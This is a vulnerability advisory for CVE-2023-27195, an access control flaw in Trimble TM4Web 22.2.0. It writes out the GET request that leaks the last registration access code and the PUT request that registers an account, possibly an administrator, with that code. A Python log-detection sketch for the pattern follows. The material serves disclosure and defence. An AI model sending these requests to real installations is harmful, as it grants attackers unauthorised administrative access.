- Trimble TM4Web 22.2.0 Privilege Escalation / Access Code Disclosure
- Authored by Clement Cruchet
An access control issue in Trimble TM4Web version 22.2.0 allows unauthenticated attackers to access a specific crafted URL path to retrieve the last registration access code and use this access code to register a valid account. If the access code was used to create an Administrator account, attackers are also able to register new Administrator accounts with full rights and privileges.
- advisories | CVE-2023-27195
- SHA-256 | f463a33e91d671de7054018540aff6f6ec53938dedf239b9646be10f49edfccf
CVE ID: CVE-2023-27195
Description:
An access control issue in Trimble TM4Web v22.2.0 allows
unauthenticated attackers to access a specific crafted URL path to
retrieve the last registration access code and use this access code to
register a valid account. If the access code was used to create an
Administrator account, attackers are also able to register new
Administrator accounts with full rights and privileges.
Vulnerability Type: Broken Access Control
Vendor of Product: Trimble - Transportation
(https://transportation.trimble.com/products/TM4Web)
Affected Product Code Base: TM4Web v22.2.0
Affected Component: User registration process
Attack Type: Remote
Impact: Privilege escalation / authentication bypass
Attack Vectors:
1. Accessing the last access code
GET /inc/tm_ajax.msw?func=UserfromUUID&uuid=
Host: example.host.com
2. Sending PUT request to create a new user account with previously retrieved access code
PUT /inc/tm_ajax.msw
Host: example.host.com [...]
WEB_UUID=&USERNAME=ccruchet&FIRST_NAME=test&LAST_NAME=test&COMPANY=test&DEPARTMENT=test&ADDRESS1=test&ADDRESS2=test&CITY=test&STATE_CODE=BC&COUNTRY_CODE=CA&POSTAL_CODE=J3L0B8&PHONE=1111111111&PHONE_EXT=&FAX=&EMAIL=[e-mail address obfuscated in the source page]&LANGUAGE=EN&ACCESS_CODE=XXXXXX&pwd1=Password123&pwd2=Password123&isReadonly=false&func=WebUser
Discoverer: Clément Cruchet (lutzenfried)
References:
- Official website: https://transportation.trimble.com/products/TM4Web
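
Detection sketch (an added example, not part of the original advisory or any Trimble tooling): it scans web server access logs for the two requests listed under Attack Vectors, flagging a `UserfromUUID` lookup with an empty `uuid` and a later PUT to the same endpoint from the same client. The combined log format, the 10-minute correlation window and the sample log lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/Nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [02/May/2023:10:15:01 +0000] "GET /inc/tm_ajax.msw?func=UserfromUUID&uuid= HTTP/1.1" 200 412 "-" "curl/8.0"
198.51.100.4 - - [02/May/2023:10:15:20 +0000] "GET /inc/tm_ajax.msw?func=UserfromUUID&uuid=3f2a9c10-aaaa-bbbb-cccc-0123456789ab HTTP/1.1" 200 398 "-" "Mozilla/5.0"
203.0.113.7 - - [02/May/2023:10:16:30 +0000] "PUT /inc/tm_ajax.msw HTTP/1.1" 200 57 "-" "curl/8.0"
198.51.100.9 - - [02/May/2023:11:40:00 +0000] "PUT /inc/tm_ajax.msw HTTP/1.1" 200 57 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
ENDPOINT = "/inc/tm_ajax.msw"   # path taken from the advisory, compared case-insensitively
WINDOW = timedelta(minutes=10)  # assumed correlation window; tune per site

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    url = urlsplit(target)
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method.upper(), "path": url.path.lower(),
            "query": parse_qs(url.query, keep_blank_values=True), "status": int(status)}

def is_blank_uuid_lookup(ev):
    """GET to the endpoint with func=UserfromUUID and a missing or empty uuid."""
    q = {k.lower(): v for k, v in ev["query"].items()}
    func = [f.lower() for f in q.get("func", [])]
    uuid_vals = q.get("uuid", [""])
    return (ev["method"] == "GET" and ev["path"] == ENDPOINT
            and "userfromuuid" in func and all(not u.strip() for u in uuid_vals))

def detect(log_text):
    findings, lookups = [], {}  # lookups: client IP -> time of last blank-uuid lookup
    for ev in filter(None, map(parse, log_text.splitlines())):
        if is_blank_uuid_lookup(ev):
            lookups[ev["ip"]] = ev["time"]
            findings.append(("blank_uuid_lookup", ev["ip"], ev["time"].isoformat()))
        elif ev["method"] == "PUT" and ev["path"] == ENDPOINT:
            seen = lookups.get(ev["ip"])
            if seen and timedelta(0) <= ev["time"] - seen <= WINDOW:
                findings.append(("lookup_then_registration", ev["ip"], ev["time"].isoformat()))
    return findings

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

Access logs do not record the PUT body, so the second finding is a heuristic based on client address and timing; confirm it against the application's user-creation records.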